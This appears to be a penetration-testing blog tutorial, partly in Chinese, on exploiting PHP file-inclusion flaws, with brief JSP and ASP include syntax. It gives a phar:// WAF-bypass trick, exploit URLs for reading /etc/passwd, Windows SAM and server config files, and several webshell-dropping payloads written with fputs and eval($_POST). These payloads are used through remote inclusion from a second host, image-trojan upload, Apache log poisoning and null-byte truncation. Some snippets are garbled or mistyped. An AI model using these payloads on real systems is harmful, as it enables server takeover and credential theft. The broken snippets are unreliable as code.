File inclusion vulnerability is a commonly used vulnerability in penetration testing, mainly used to bypass waf to upload Trojan files. When I was visiting the Tools forum today, I found a new type of file containment gesture, record and share it here, and attach some basic exploit gestures for file containment vulnerabilities.
special pose
Using the phar:// protocol feature can help us bypass some waf detection during the penetration process. The phar:// data stream wrapper has been effective since PHP 5.3.0, and it seems that it can bypass the security dog.
Utilization process
New shell.php code content:
|
1
2
3
|
<?php
include
'phar://test.rar/test.txt'
;
?>
|
New content in test.txt:
|
1
2
3
|
<?php
phpinfo();
?>
|
Compress the test.txt file, you can rename the compressed file to zip, phar, rar and other formats, and then access the shell.php file, the phpinfo content will appear.
Pro test is effective
In the experimental environment, create new shell.php and test.txt in the test directory, and package test.txt into test.zip. The content of shell.php is as follows: The content of test.txt is as follows: Access shell.php:
Reference: http://bbs.pediy.com/thread-216191.htm
php file contains vulnerability
File inclusion in PHP is divided into local inclusion and remote inclusion.
local include
Create a new phpinfo.txt, then create a new shell.php and write:
|
1
2
3
|
<?php
Include(
"phpinfo.txt"
);
?>
|
访问shell.php会输出phpinfo页面内容,无论将扩展名改为什么,都将以php代码执行。如果文件不是符合php规则的(即没有写<?php ?>等),则通过include可以直接输出源码。
远程包含
前提:需要开启allow_url_fopen,默认关闭。
新建php.txt:
|
1
2
3
|
<?php
echo
"hello world";
?>
|
新建index.php:
|
1
2
3
|
<?php
Include(
$_GET[
'page']);
?>
|
访问http://www.xxxx.com/page=http://www.xxxx.com/php.txt执行结果将输出hello world。
文件包含利用
读取敏感信息
如:http://www.xxx.com/index.php?page=/etc/passwd
Windows:
|
1
2
3
4
5
|
c:\boot.ini
c:\windows\systems32\inetsrv\MetaBase.xml
c:\windows\repair\sam
c:\windows\php.ini php配置文件
c:\windows\my.ini mysql配置文件
|
LINUX:
|
1
2
3
4
5
|
/etc/passwd
/usr/
local/app/apache2/conf/http.conf
/usr/
local/app/php5/lib/php.ini PHP相关设置
/etc/httpd/conf/http.conf apache配置文件
/etc/my.cnf mysql配置文件
|
远程包含shell
test.txt文件,可以保存在远程服务器上,内容如下:
|
1
|
<?fputs(fopen(
"shell.php",
"w"),
"<?php eval($_POST[nmask]);?>")?>
|
如果目标网站存在远程包含漏洞,则可以通过访问:http://www.xxx1.com/index.php?page=http://www.xx2.com/test.txt则会在服务器根目录下生产一个shell.php内容为:
|
1
|
<?php
eval(
$_POST[nmask]);?>
|
本地包含配合文件上传
如果目标服务器关闭了allow_url_fopen,则可以尝试使用本地包含+文件上传
上传一个图片木马a.jpg,内容为:
|
1
|
<?fputs(fopen(
"shell.php",
"w"),
"<?php eval($_POST[tzc]);?>")?>
|
访问URL:http://www.xxx.com/index.php?page=./a.jpg在本地生成shell.php。
本地包含配合apache日志拿shell
apache日志分为access.log与error.log,当我们请求一个url地址时,便会记录在access.log中,但如果访问一个不存在的页面,便会将这个页面写入access.log中。如访问URL:http://www.xxx.com/<?php eval([$_POST]);?>则会将一句话写入到access.log中,但是一般来说,写入到access.log文件中的一句话是被编码的,所以需要抓包绕过,而且利用此漏洞需要知道access.log的地址,不然便没有。
截断包含
有些开发者为了防止本地包含漏洞,会编写一下代码:
|
1
2
3
|
<?php
Include
$_GET[
'page'].
".php"
?>
|
新建1.jpg:
|
1
|
<?fputs(fopen(
"shell.php",
"w"),
"<?php eval($_POST[tzc]);?>")?>
|
这样的话比如上传一个1.jpg图片码,则访问http://www.xxx.com/1.jpg时,访问的是1.jgp.php,以为没有这个文件所以报错。这是,可以尝试访问http://www.xxx.com/1.jpg%00
jsp文件包含漏洞
include
|
1
2
3
|
<%@ include file=
"head.jsp"%>
<%@ include file=
"body.jsp"%>
<%@ include file=
"tail.jsp"%>
|
jsp:include
|
1
2
3
|
<jsp:include page=
"head.jsp"/>
<jsp:include page=
"body.jsp"/>
<jsp:include page=
"tail.jsp”/>
|
采用JSTL
|
1
|
<c:import url=
"http://thief.one/1.jsp">
|
说明
(1)include指令在转换时插入“Header.jsp”的源代码,而标准动作在运行时插入“Header.jsp”的响应。元素允许你包含动态文件和静态,而include说明标签仅仅是把一个文件内容当成静态追加到主文件中去。
(2)采用前两种方式,只能包含当前web应用的界面,不过c:import可以包含容器之外的内容。
asp文件包含漏洞
asp貌似无法包含远程文件(iis安全设置),只能包含本地文件,语法如下:
|
1
|
<!--
#include file="1.asp" -->
|
aspx文件包含漏洞
aspx文件包含与asp一样,语法如下:
|
1
|
<!--
#include file="top.aspx" -->
|